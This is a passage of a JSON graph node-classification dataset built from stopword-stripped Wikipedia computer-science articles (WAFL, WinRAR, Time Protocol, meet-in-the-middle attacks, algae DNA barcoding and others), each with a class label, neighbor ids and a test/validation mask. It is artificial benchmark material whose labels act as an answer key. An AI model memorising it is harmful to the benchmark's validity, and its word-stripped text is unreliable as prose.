coaxpress mature official standard first draft version 1.0 presented december 2010 transmission medium coaxpress coaxial cable characteristic impedance 75 ω maximum transmission distance depending bit rate quality cable rg11 rg6 rg59 cable types used also possible reuse existing coaxial cable upgrading analogue digital camera system standard connector coaxpress 75 ω bnc connector second connector option din 1.0/2.3 connector solutions 5w5 connector also demonstrated officially supported coaxpress consortium coaxpress scalable standard used connections 1.25 gbit/s 25 gbit/s coaxpress supports low speed uplink channel frame grabber camera uplink channel fixed bit rate 20.833 mbit/s uplink channel uses 8b/10b encoding uplink used camera control triggering firmware updates using multilane din 1.0/2.3 cabling solution optional high speed uplink also used allowing 6.25 gbit/s uplink communication camera used accurate triggering common application interface cameras computers via frame grabber applications machine vision involve automated acquisition analysis images cameras frame grabbers introduced support utilize coaxpress interface standard far one company eqcologic develops coaxpress compatible driver equalizer devices devices must used fpga devices order implement coaxpress standard protocol standard implementation executed using fpga ip core specially designed protocol takes care features defined standard side vision system e.g camera frame grabber requires dedicated fpga ip core",
    "neighbors": [
      10833,
      3886
    ],
    "mask": "None"
  },
  {
    "node_id": 887,
    "label": 0,
    "text": "Lexical_substitution:lexical substitution lexical substitution task identifying substitute word context clause instance given following text match replace remaining fluid deficit prevent chronic dehydration throughout tournament substitute game might given lexical substitution strictly related word sense disambiguation wsd aim determine meaning word however wsd consists automatically assigning appropriate sense fixed sense inventory lexical substitution impose constraint substitute choose best representative word context prescribing inventory lexical substitution overcomes issue granularity sense distinctions provides level playing field automatic systems automatically acquire word senses task referred word sense induction order evaluate automatic systems lexical substitution task organized semeval-2007 evaluation competition held prague 2007 semeval-2010 task cross-lingual lexical substitution also taken place skip-gram model takes words similar meanings vector space collection objects added together multiplied numbers found close n-dimensions list items variety neural networks computer system modeled human brain formed together result vectors networks related together occurs dimensions vocabulary generated network model used lexical substitution automation prediction algorithms one algorithm developed oren melamud omer levy ido dagan uses skip-gram model find vector word synonyms calculates cosine distance vectors determine words best substitutes sentence like dog walked quick pace word specific vector relation vector would 1,0,0,0,0,0,0 1 word vocabulary 0s words surrounding vocabulary create vector",
    "neighbors": [
      1890,
      10231,
      5781,
      2999,
      538,
      1214
    ],
    "mask": "None"
  },
  {
    "node_id": 888,
    "label": 1,
    "text": "PhpLiteAdmin:phpliteadmin phpliteadmin open-source tool written php intended handle administration sqlite world wide web feature set interface overall user experience comparable phpmyadmin mysql way sqlite flat file database phpliteadmin distributed form single php file currently approx 200 kib size ease installation portability small size go hand hand sqlite",
    "neighbors": [
      8644,
      5546,
      10413,
      5198,
      7022,
      10737,
      9075,
      2456,
      9177,
      5435,
      1501
    ],
    "mask": "None"
  },
  {
    "node_id": 889,
    "label": 2,
    "text": "POSSE_project:posse project portable open source security elements posse project co-operative venture university pennsylvania distributed systems laboratory openbsd project others received funding grant united states defense advanced research projects agency darpa project goal increase security open source projects including apache openssl project ran 2001 april 2003 grant darpa prematurely terminated security initiative directed university pennsylvania distributed systems laboratory paid composable high assurance trusted systems programme posse us 2,125,000 grant introduce advanced security features used special-purpose government computers standard office pcs united states government hoped benefit availability better security features affordable standardized computers software openbsd selected computing world ’ secure forum development open-source software approximately us 1,000,000 allotted development colleagues posse project included theo de raadt founder leader openbsd project ben laurie apache software foundation openssl group numerous faculty graduate students university pennsylvania april 2003 speaking interview canadian newspaper globe mail theo de raadt remarked occupation iraq try convince grant means half cruise missile n't get built jonathan smith head posse project stated us military officials expressed discomfort comment darpa funding project subsequently terminated theorized us government disapproved de raadt comments led decision cancel grant however darpa spokeswoman jan walker explained triggered recent world events specifically evolving threat posed increasingly capable nation-states",
    "neighbors": [
      865,
      1946,
      7702
    ],
    "mask": "Test"
  },
  {
    "node_id": 890,
    "label": 6,
    "text": "Write_Anywhere_File_Layout:write anywhere file layout write anywhere file layout wafl proprietary file system supports large high-performance raid arrays quick restarts without lengthy consistency checks event crash power failure growing filesystems size quickly designed netapp use storage appliances like netapp fas aff cloud volumes ontap ontap select author claims wafl file system although includes one tracks changes similarly journaling file systems logs known nvlogs dedicated memory storage device non-volatile random access memory referred nvram nvmem wafl provides mechanisms enable variety file systems technologies want access disk blocks wafl stores metadata well data files metadata inodes block maps indicating blocks volume allocated stored fixed locations file system top-level file volume inode file contains inodes files inode inode file called root inode stored block fixed location inode sufficiently small file contains file contents otherwise contains list pointers file data blocks list pointers indirect blocks containing lists pointers file data blocks forth many layers indirect blocks necessary forming tree blocks data metadata blocks file system block containing root inode stored files file system root inode thus used locate blocks files inode file main memory used page cache blocks files change made block file copy page cache updated marked dirty change logged non-volatile memory log called nvlog dirty block page cache written permanent storage rewritten block read instead new block allocated permanent storage contents block written new location inode indirect block pointed block question updated main memory block containing inode indirect block written permanent storage also written new location rather overwritten previous location write anywhere write anywhere file layout refers blocks block containing root inode found via root inode none changes written permanent storage visible permanent storage root inode updated root inode updated process called consistency point dirty blocks yet written permanent storage written permanent storage new root inode written pointing blocks new version inode file point changes file system visible permanent storage using new root inode nvlog entries changes visible discarded make room log entries subsequent changes consistency points performed periodically non-volatile memory close full log entries server crashes changes file system made visible consistency point changes made visible still nvlog server reboots replays entries nvlog making changes recorded nvlog lost discussed wafl store data metadata pre-determined locations disk instead automatically places data using temporal locality write metadata alongside user data way designed minimize number disk operations required commit data stable disk storage using single dual parity based raid using data placement based temporal locality reference improve performance reading datasets read similar way way written e.g database record associated index entry however also cause fragmentation perspective spatial locality reference spinning hdds adversely affect files sequentially written randomly read subsequently read using temporal pattern affect sequential read random write spatial data access patterns magnetic head could one position time read data platter fragmentation effect ssd drives releases ontap since 7.3.1 included number techniques optimize spatial data layout reallocate command perform scheduled manual defragmentation write reading volume option detects automatically corrects suboptimal data access patterns caused spatial fragmentation releases ontap 8.1.1 include techniques automatically optimize contiguous free-space within filesystem also helps maintain optimal data layouts data access patterns 7g wafl scan reallocate command would need invoked advanced privilege level could scheduled releases ontap since 9.1 included number techniques optimize ssd usage inline data compaction 9.1 starting ontap 9.2 fabricpool functionality automatic tiering cold data slow s3 storage back needed ssd aggregates cross volume deduplication within aggregate maximum 800tib aggregate wafl supports snapshots read-only copies file system snapshots created performing operations performed consistency point instead updating root inode corresponding current state file system saving copy root inode data metadata file system found root inode data metadata file system time snapshot created found snapshot copy root inode data needs copied create snapshot blocks allocated written using block map keeps track blocks use blocks free entry block map contains bit indicating whether block use current version file system several bits one per snapshot indicating whether block use snapshot ensures data snapshot overwritten snapshot deleted using block map new writes rewrites written new empty blocks wafl reports block rewrite successful rewrites actually occur approach called redirect-on-write row technique row much faster rewrite operations compare copy-on-write old data block going rewritten in-place captured snapshot needs copied first space allocated snapshot reserve order preserve original data generates additional data copy operations system get rewrites block snapshots provide online backups accessed quickly special hidden directories file system allowing users recover files accidentally deleted modified netapp data ontap release 7g operating system supports read-write snapshot called flexclone snapshots basis technologies like snapmirror snapvault online volume move features like flexclone snaplock snaprestore snapshot-like technologies leverage wafl capabilities properties like manipulations inodes starting ontap 9.4 maximum number snapshots supported flexvol 1024 previous versions max limit 255 starting ontap 9.5 snapshot sharing functionality added run deduplication scan across active file system snapshots deduplication savings magnitude number snapshots 9.5 deduplicated data locked snapshot ’ used deduplication process runs active file system important feature wafl support unix-style file directory model nfs clients microsoft windows-style file directory model smb clients wafl also supports security models including mode different files volume different security attributes attached unix use either access control lists acl simple bitmask whereas recent windows model based access control lists two features make possible write file smb type networked filesystem access later via nfs unix workstation alongside ordinary files wafl contain file-containers called luns required special attributes like lun serial number block devices could accessed using san protocols running ontap os software flexible volume flexvol separate wafl file system located aggregate distributed across disks aggregate aggregate contain usually multiple flexvol volumes ontap data optimization process including tetris finishes consistency points see nvram programmed evenly distribute data blocks much possible flexvol volume across disks aggregate flexvol could potentially use available performance data disks aggregate approach even data block distribution across data disks aggregate performance throttling flexvol could done dynamically storage qos require dedicated aggregates raid groups flexvol guarantee performance provide unused performance flexvol volume requires flexvol could configured thick thin provisioned space later could changed fly time block device access sun protocols like iscsi fc fcoe done lun emulation similar loop device technique top flexvol volume thus lun wafl file system appears file yet additional properties required block devices luns also configured thick thin provisioned changed later fly due wafl architecture flexvols luns increase decrease configured space usage fly flexvol contains data internal space decreased less used space even though lun size data could decreased wafl file system ontap knowledge upper level block structure due san architecture could truncate data damage file system lun host needs migrate blocks containing data new lun boundary prevent data loss flexvol qos flashpool flascache fabricpool policies similar raid-1 plexes ontap systems keep mirrored data two places conventional raid-1 must exist within bounds one storage system two plexes could distributed two storage systems aggregate consists one two plexes ordinary ha storage systems one plex aggregate syncmirror local metrocluster configurations two plexes aggregate hand plex includes underlying storage space one netapp raid groups luns third-party storage systems see flexarray single plex similarly raid-0 aggregate consists two plexes one plex considered master second slave slaves must consist exactly raid configuration drives example aggregate consisting two plexes master plex consists 21 data 3 1.8 tb sas parity drives raid-tec slave plex must consist 21 data 3 1.8 tb sas parity drives raid-tec second example aggregate consisted two plexes master plex consists one raid 17 data 3 parity sas drives 1.8 tb configured raid-tec second raid master plex raid-dp 2 data 2 parity ssd 960 gb second plex must configuration one raid 17 data 3 parity sas drives 1.8 tb configured raid-tec second raid slave plex raid-dp 2 data 2 parity ssd 960 gb metrocluster configurations use syncmirror technology synchronous data replication two syncmirror options metrocluster local syncmirror using plex technique synchronous replication data two plexes local syncmirror creates plexes single controller often used additional security prevent failure entire disk shelf storage system metrocluster allows data replicated two storage systems storage system could consist one controller configured ha pair two controllers single ha pair possible two controllers separate chassis distance could tens meters metrocluster configuration distance could 300 km many competitors netapp ontap systems utilizing memory much faster storage medium accepting caching data hosts importantly data optimization writes greatly improve performance storage systems competitors widely using non-volatile random-access memory nvram preserve data unexpected events like reboot write caching data optimization netapp ontap systems using ordinary random-access memory ram data optimization dedicated nvram nvdimm logging initial data unchanged state came hosts similarly transaction logging done relational databases case disaster naturally ram automatically cleared reboot data stored nonvolatile memory form logs called nvlogs survive reboot used restore consistency changes optimizations ontap systems done ram helps reduce size nonvolatile memory ontap systems optimizations data hosts structured tetris-like manner optimized prepared passing stages i.e. wafl raid written underlying disks raid groups aggregate data going stored optimizations data going sequentially written disks part consistency point cp transaction data written aggregates contain necessary wafl metadata raid parity additional read data disks calculate write parity disks operations occur traditional raid-6 raid-4 groups cp first creating system snapshot aggregate data going written optimized prepared data ram written sequentially single transaction aggregate fails whole transaction fails case sudden reboot allows wafl file system always consistent case successful cp transaction new active file system point propagated corresponding nvlogs cleared data always going written new place rewrites occur data blocks deleted hosts marked free could used later next cp cycles system run space always-write-new-data-to-new-place policy wafl nvlogs ha storage systems replicated synchronously two controllers ha storage system failover capability helps reduce overall system memory protection overheads storage system two controllers ha configuration metrocluster one controller site two controllers divides nonvolatile memory two pieces local partner metrocluster configuration four nodes nonvolatile memory divided next pieces local local partner remote partner starting all-flash fas a800 system netapp replaced nvram pci module nvdimms connected memory bus increasing performance",
    "neighbors": [
      5120,
      2051,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      9286,
      1109,
      4708,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      7863,
      5816,
      8379,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      5940,
      6970,
      11072,
      3909,
      2378,
      2383,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      5492,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      1422,
      6545,
      11667,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      6569,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      3512,
      1978,
      8643,
      7126,
      2015,
      3042,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 891,
    "label": 5,
    "text": "Time_Protocol:time protocol time protocol network protocol internet protocol suite defined 1983 rfc 868 jon postel k. harrenstein purpose provide site-independent machine readable date time time protocol may implemented transmission control protocol tcp user datagram protocol udp host connects server supports time protocol port 37 server sends time 32-bit unsigned integer binary format network byte order representing number seconds since 00:00 midnight 1 january 1900 gmt closes connection operation udp requires sending datagram server port connection setup udp fixed 32-bit data format means timestamp rolls approximately every 136 years first occurrence 7 february 2036 programs use time protocol must carefully designed use context-dependent information distinguish dates 1900 many unix-like operating systems used time protocol monitor synchronize clocks using rdate utility function superseded network time protocol ntp corresponding ntpdate utility ntp sophisticated various ways among resolution finer one second unix-like operating systems time protocol server built inetd xinetd daemon service usually enabled default may enabled adding following lines file /etc/inetd.conf reloading configuration",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      5397,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      933,
      2085,
      3750,
      3751,
      3752,
      9381,
      10924,
      562,
      2996,
      9909,
      10171,
      3133,
      829,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      849,
      6993,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      871,
      10344,
      11112,
      367,
      8432,
      10484,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 892,
    "label": 4,
    "text": "Partial-matching_meet-in-the-middle_attack:partial-matching meet-in-the-middle attack partial-matching technique used mitm attack partial-matching intermediate values mitm attack formula_1 formula_2 computed plaintext ciphertext matched select bits instead complete state limitation mitm attacks amount intermediate values needs stored order compare intermediate values formula_1 formula_2 formula_1 need computed stored first computed formula_2 compared two subciphers identified mitm attack sufficiently large subkey unfeasible amount intermediate values need stored techniques cycle detection algorithms allows one perform mitm attack without storing either values formula_1 formula_2 techniques requires subciphers mitm attack symmetric thus solution allows one perform mitm attack situation subkeys cardinality large enough make amount temporary values need stored infeasible allows one store temporary values use still limited allows one perform mitm attack subcipher bits example 1/8 intermediate value stored subkey needs 3 bits larger amount memory required anyway since formula_9 cases far useful feature provided partial-matching mitm attacks ability compare intermediate values computed different rounds attacked cipher diffusion round cipher low enough might possible span rounds find bits intermediate states changed probability 1 bits intermediate states still compared disadvantage uses false positives key candidates needs tested rule chance false positive given probability formula_10 formula_11 amount matched bits step-by-step example complete attack ktantan see example 3-subset mitm page example deals part needs partial-matching useful know ktantan 254-round blockcipher round uses 2 bits 80-bit key 3-subset attack ktantan family ciphers necessary utilize partial-matching order stage attack partial-matching needed intermediate values plain- ciphertext mitm attack computed end round 111 start round 131 respectively since span 20 rounds could compared directly authors attack however identified useful characteristics ktantan held probability 1 due low diffusion per round ktantan security number rounds found computing forwards round 111 backwards round 131 round 127 8 bits intermediate states would remain unchanged 8 bits round 127 ktantan32 10 bits round 123 47 bits round 131 ktantan48 ktantan64 respectively comparing 8 bits intermediate value authors able orchestrate mitm attack cipher despite 20 rounds two subciphers using partial-matching increased amount false positives nothing noticeably increased complexity attack",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      11185,
      10806,
      1847,
      9528,
      2110,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034
    ],
    "mask": "None"
  },
  {
    "node_id": 893,
    "label": 1,
    "text": "NaPTAN:naptan national public transport access node naptan database uk nationwide system uniquely identifying points access public transport uk database closely associated national public transport gazetteer every uk railway station coach terminus airport ferry terminal bus stop taxi rank place public transport joined left allocated unique naptan identifier relationship stop city town village locality indicated association elements national public transport gazetteer cen standardisation initiative identification fixed objects public transport 'ifopt develop naptan concepts european standard stop identification extension transmodel european standard public transport information ability identify locate stops relation topography consistently economically fundamental modern computer based systems provide passenger information manage public transport networks stop data needed journey planners scheduling systems real-time systems transport planning performance monitoring many purposes digitalising nation public transport stops essential step creating national information infrastructure uk naptan enabled creation transport direct portal uk nationwide system multi-modal journey planning naptan also underpins transxchange uk standard bus schedules used electronic registration bus services naptan comprises several distinct elements naptan identifiers designed used within uk digital national framework system unique persistent reference shareable information resources types managed ordnance survey naptan includes related standard uk national public transport gazetteer national public transport access node database holds current copy uk stops stops submitted ptes central authority consolidates stops distributes back users 450,000 stop points current database naptan database maintained centrally contract department transport naptan data described naptan xml schema used describe naptan data exchanging systems xml documents versioned different generations data managed see http //www.dft.gov.uk/naptan/schema/2.4/naptan.xsd nptg naptan data conforms family consistent interlocking data models models described nptg naptan schema guide uml notation naptan identifiers systematic way identifying uk points access public transport stop points naptan stop points number text descriptor elements associated name also additional labels distinguishing identifiers help users recognise elements combined different ways provide presentations names useful many different contexts example maps stop finders timetables etc. mobile devices purpose descriptors create iterative level detail i.e country county locality street name identifier information included user data decide much data relevant task hand every naptan point includes geospatial coordinates specified ordnance survey national grid format wgs84 latitude longitude pairs allows naptan points projected maps associated information layers integrated transport network ordnance survey national public transport gazetteer closely associated naptan dataset contains details every city town village suburb great britain i.e. uk including northern ireland dataset based usage names rather legal definitions includes local informal names places well official names",
    "neighbors": [
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 894,
    "label": 6,
    "text": "WinRAR:winrar winrar trialware file archiver utility windows developed eugene roshal win.rar gmbh create view archives rar zip file formats unpack numerous archive file formats enable user test integrity archives winrar embeds crc32 blake2 checksums file archive winrar supports creating encrypted multi-part self-extracting archives winrar windows-only program android application called rar android also available related programs include command-line utilities rar unrar versions macos linux freebsd windows ce ms-dos winrar rar file format evolved time support archive format rar5 using rar file extension earlier versions added version 5.0 files older rar file format since referred rar4 winrar versions 5.0 support rar5 archives older versions winrar run windows versions prior xp open rar5 archives rar5 file format increased maximum dictionary size 1 gib 11 different compression directory sizes 1 mib 1 gib available default version 5 increased 4 mib 32 mib typically improving compression ratio aes encryption used increased 128- 256-bit maximum path length files rar zip archives increased 2048 characters options added v5.0 include 256-bit blake2 file-hashing algorithm instead default 32-bit crc32 duplicate file detection ntfs hard symbolic links quick open record allow large archives opened faster rar5 file format removed comments file though archive comment still remains authenticity verification specialized compression algorithms text multimedia files rar5 also changed file name split volumes archivename.rnn archivename.partnn.rar creating rar archives software distributed try buy may used without charge 40 days china free-to-use personal edition provided officially since 2015 although archiving rar format proprietary rarlab supplies copyrighted freeware c++ source code current unrar unpacker license allowing used software thus enabling others produce software capable unpacking creating rar archives rar android free charge displays advertisements payment disabled license winrar provide ad-suppression rar android february 2019 major security vulnerability unacev2.dll library used winrar decompress ace archives discovered consequently winrar dropped support ace format version 5.7 self-extracting archives created versions 5.31 including executable installer winrar vulnerable dll hijacking may load use dlls named uxtheme.dll riched32.dll riched20.dll folder executable file widely reported winrar v5.21 earlier remote code execution rce vulnerability could allow remote attacker insert malicious code self-extracting executable sfx file created user putting 500 million users software risk however examination claim revealed vulnerability existed result merely sfx delivered payload executed published responses dismissed threat one saying find suckers trust .exe labelled self-extracting archive ... trick running smuggled javascript recent versions support many older operating systems versions supporting older operating systems may still available maintained",
    "neighbors": [
      5380,
      6022,
      10121,
      1420,
      8976,
      2193,
      7313,
      5523,
      1940,
      3222,
      9880,
      9121,
      10489,
      3114,
      10027,
      3629,
      7983,
      3250,
      5682,
      7218,
      950,
      823,
      6713,
      2755,
      11076,
      1352,
      4296,
      10317,
      9166,
      10575,
      4561,
      722,
      11605,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      7529,
      4459,
      5356,
      237,
      1646,
      10476,
      1776,
      4849,
      499,
      7667,
      6389,
      10102,
      4089,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 895,
    "label": 4,
    "text": "Adversary_(cryptography):adversary cryptography cryptography adversary rarely opponent enemy malicious entity whose aim prevent users cryptosystem achieving goal primarily privacy integrity availability data adversary efforts might take form attempting discover secret data corrupting data system spoofing identity message sender receiver forcing system downtime actual adversaries opposed idealized ones referred attackers former term predominates cryptographic latter computer security literature eve mallory oscar trudy adversarial characters widely used types texts notion adversary helps intuitive formal reasoning cryptosystems casting security analysis cryptosystems 'game users centrally co-ordinated enemy notion security cryptosystem meaningful respect particular attacks usually presumed carried particular sorts adversaries several types adversaries depending capabilities intentions presumed adversaries may actual security practice attacks assigned adversaries often seen notional analysis merely theoretical successful adversary breaking system measured advantage adversary advantage difference adversary probability breaking system probability system broken simply guessing advantage specified function security parameter",
    "neighbors": [
      4163,
      939,
      11119,
      9393,
      7251,
      8694,
      5433,
      7229,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 896,
    "label": 8,
    "text": "Web_audience_measurement:web audience measurement web audience measurement wam audience measurement website analytics tool measures internet usage india system joint effort imrb international internet mobile association india surveys 6000 individuals across 8 metropolitan centers india tracks variety metrics time-on-site exposure reach frequency internet usage wam uses audience measurement continuous tracking panel study provides cross sectional data internet usage segmented gender sec location panel-based approach uses metering technology design indian context tracks computers web rating points factor multiple measures internet usage provide comprehensive picture web advertisers attempts standardize web analytics india web analytics market india currently fragmented comscore vizisense imrb key competitors several discussions revolve around difference numbers provided competitors digital audience measurement space therefore choosing right measurement partner imperative media stakeholders creates rifts users two different audience measurement tools",
    "neighbors": [
      6576
    ],
    "mask": "Test"
  },
  {
    "node_id": 897,
    "label": 4,
    "text": "Algae_DNA_barcoding:algae dna barcoding dna barcoding algae commonly used species identification phylogenetic studies algae form phylogenetically heterogeneous group meaning application single universal barcode/marker species delimitation unfeasible thus different markers/barcodes applied aim different algal groups diatom dna barcoding method taxonomical identification diatoms even species level conducted using dna rna followed amplification sequencing specific conserved regions diatom genome followed taxonomic assignment one main challenges identifying diatoms often collected mixture diatoms several species dna metabarcoding process identifying individual species mixed sample environmental dna also called edna dna extracted straight environment soil water samples newly applied method diatom dna metabarcoding used ecological quality assessment rivers streams specific response diatoms particular ecologic conditions species identification via morphology relatively difficult requires lot time expertise high-throughput sequencing hts dna metabarcoding enables taxonomic assignment therefore identification complete sample regarding group specific primers chosen previous dna amplification several dna markers already developed mainly targeting 18s rrna using v4 hypervariable region ribosomal small subunit dna ssu rdna dna-based identification found efficient classical morphology based approach conserved regions genomes frequently used marker genes ribulose-1-5-bisphosphate carboxylase rbcl cytochrome oxidase cox1 coi 28s shown repeatedly molecular data gained diatom edna metabarcoding quite faithfully reflect morphology-based biotic diatom indices therefore provide similar assessment ecosystem status meantime diatoms routinely used assessment ecological quality freshwater ecosystems together aquatic invertebrates considered best indicators disturbance related physical chemical biological conditions watercourses numerous studies using benthic diatoms biomonitoring ideal diatom dna barcode found proposed different markers used different purposes indeed highly variable cox1 28s genes considered suitable taxonomic studies conserved 18s rbcl genes seem appropriate biomonitoring applying dna barcoding concept diatoms promises great potential resolve problem inaccurate species identification thus facilitate analyses biodiversity environmental samples.. molecular methods based ngs technology almost always leads higher number identified taxa whose presence could subsequently verified light microscopy results study provides evidence edna barcoding diatoms suitable water quality assessment could complement improve traditional methods stoeck et al also showed edna barcoding provides insight diatom diversity protist communities therefore could used ecological projection global diversity studies showed different results example inventories obtained molecular-based method closer obtained morphology-based method abundant species focus dna metabarcoding also increase taxonomic resolution comparability across geographic regions often difficult using morphological characters moreover dna-based identification allows extending range potential bioindicators including inconspicuous taxonomic groups could highly sensitive tolerant particular stressors indirectly molecular methods also help filling gaps knowledge species ecology increasing number samples processed coupled decrease processing time cost-effectiveness well increasing accuracy precision correlation species/motus occurrence environmental factors currently consensus concerning methods dna preservation isolation choice dna barcodes pcr primers agreement concerning parameters motu clustering taxonomic assignment sampling molecular steps need standardize development studies one major limitation availability reference barcodes diatoms species.the reference database bioindicator taxa far complete despite constant efforts numerous national barcoding initiatives lot species still lacking barcode information furthermore existing metabarcoding data locally available geographically scattered hindering development globally useful tools visco et al estimated 30 european diatoms species currently represented reference databases example important lack number species fennoscandian communities especially acidophilic diatoms eunotia incisa also shown taxonomic identification dna barcoding accurate species level discriminate varieties example reference missing another well-known limitation barcoding taxonomic identification clustering method used taxonomic assignation often leads massive loss genetic information reliable way assess effects different clustering different taxonomic assignation processes would compare species list generated different pipelines using reference database yet done variety pipelines used molecular assessment diatom communities europe taxonomically validated databases includes accessible vouchers also crucial reliable taxa identification via ngs additionally primer bias often found major source variation barcoding pcr primers efficiency differ diatoms species i.e primers lead preferential amplification one taxon another inference abundance metabarcoding data considered one difficult issues environmental use number generated sequences hts directly correspond number specimen biomass different species produce different amount reads example due differences chloroplast size rbcl marker vasselon et al recently created biovolume correction factor using rbcl marker example achnanthidium minutissimum small biovolume thus generate less copies rbcl fragment located chloroplast larger species correction factor however requires extensive calibration species biovolume tested species far fluctuations gene copy number markers the18s marker seem species specific tested yet barcoding marker usually combine hypervariable regions genome allow distinction species conserved region insure specificity target organism several dna markers belonging nuclear mitochondrial chloroplast genomes rbcl coi its+5.8s ssu 18s… designed successfully used diatoms identification ngs 18s gene region widely used marker protist groups jahn et al first test 18s gene region diatoms barcoding zimmerman et al proposed 390–410 bp long fragment 1800 bp long 18s rrna gene locus barcode marker analysis environmental samples hts discusses use limitations diatom identification fragment includes v4 subunit largest complex highly variable regions within 18s locus highlighted hypervariable region 18s gene great potential studying protist diversity large scale limited efficiency identification species level cryptic species rbcl gene used taxonomy studies trobajo et al 2009 benefits include rarely intragenomic variation easily aligned compared open-access reference library called r-syst :diatom includes data two barcodes 18s rbcl freely accessible website kermmarec et al also successfully used rbcl gene ecological assessment diatoms rbcl marker also easily aligned compared moniz kaczmarska investigated amplification success ssu coi its2 markers found 300 – 400 bp its-2 5.8s fragment provided highest success rate amplification good species resolution marker subsequently used separate morphologically defined species success rate 99.5 despite amplification success zimmerman et al criticised use its-2 due intra-individual heterogeneity suggested ssu rbcl mann et al. 2010 markers less heterogenous individuals therefore beneficial distinguishing species diatoms routinely used part suite biomonitoring tools must monitored part european water framework directive diatoms used indicator ecosystem health freshwaters ubiquitous directly affected changes physico-chemical parameters show better relationship environmental variables taxa e.g invertebrates giving better overall picture water quality recent years researchers developed standardised tools metabarcoding sequencing diatoms complement traditional assessment using microscopy opening new avenue biomonitoring aquatic systems using benthic diatoms method next-generation sequencing approach river biomonitoring revealed good potential many studies shown metabarcoding hts high-throughput sequencing utilized estimate quality status diversity freshwaters part environment agency kelly et al developed dna-based metabarcoding approach assess diatom communities rivers uk vasselon et al compared morphological hts approaches diatoms found hts gave reliable indication quality status rivers terms specific polluosensitivity index spi vasselon et al also applied dna metabarcoding diatoms communities monitoring network rivers tropical island mayotte french dom-tom rimet et al also explored possibility using hts assessing diatom diversity showed diversity indices hts microscopic analysis well correlated although perfect dna barcoding metabarcoding used establish molecular metrics indices potentially provide conclusions broadly similar traditional approaches ecological environmental status aquatic ecosystems diatoms used diagnosis tool drowning forensic practices diatom test based principle diatom inhalation water lungs distribution deposition around body dna methods used confirm cause death indeed drowning locate origin drowning diatom dna metabarcoding provides opportunity quickly analyse diatom community present within body locate origin drowning investigate body may moved one place another diatom metabarcoding may help delimit cryptic species difficult identify using microscopy help complete reference databases comparing morphological assemblages metabarcoding data chlorophytes possess ancients taxonomically diverse lineage fang et al 2014 including terrestrial plants even though 14 000 species described based structural ultrastructural criteria hall et al 2010 morphological identification often limited several barcodes chlorophytes proposed dna-based identification order bypass problematics morphological one although cytochrome oxidase coi cox coding gene link standard barcode animals proved unsatisfactory chlorophytes gene contains several introns algae group turmel et al 2002 nuclear marker genes used chlorophytes ssu rdna lsu rdna rdna leliaert et al 2014 macroalgae challenging identify simple morphology phenotypic plasticity alternate lifecycle stages thus algal systematics identification come rely heavily genetic/molecular tools dna barcoding ssu rdna gene common used barcode phylogenetic studies macroalgae however ssu rdna highly conserved region typically lack resolution species identification past 2 decades certain standards dna barcoding aim species identification developed main groups macroalgae cytochrome c oxidase subuinit coi gene commonly used barcode red brown algae tufa plastid elongation factor rbcl rubisco large subunit internal transcribe spacer commonly used green algae barcodes typically 600-700 bp long barcodes typically differ 3 main groups macroalgae red green brown evolutionary heritage diverse macroalgae polyphyletic group meaning within group share recent common ancestor making challenging find gene conserved among variable enough species identification adapted detailed information dna barcoding different organisms found microbial dna barcoding dna barcoding fish dna barcoding dna barcoding diet assessment",
    "neighbors": [
      897,
      902,
      1022
    ],
    "mask": "Test"
  },
  {
    "node_id": 898,
    "label": 9,
    "text": "Man_or_boy_test:man boy test man boy test proposed computer scientist donald knuth means evaluating implementations algol 60 programming language aim test distinguish compilers correctly implemented recursion non-local references algol 60 creates tree b call frames refer containing call frames copy k changes every time associated b called trying work paper probably fruitless k =10 correct answer −67 despite fact original paper knuth conjectured −121 survey paper charles h. lindsey mentioned references contains table different starting values even modern machines quickly run stack space larger values k tabulated three algol features used program difficult implement properly compiler things however test 're merely prerequisites test meaningful test whether different references b resolve correct instance b — one access -local symbols b created reference boy compiler might example instead compile program b always accesses topmost call frame",
    "neighbors": [
      512,
      1952,
      2817,
      11163,
      37,
      1610,
      8587,
      8524,
      4877,
      2798,
      7471,
      5040,
      5783,
      2939,
      2588,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 899,
    "label": 4,
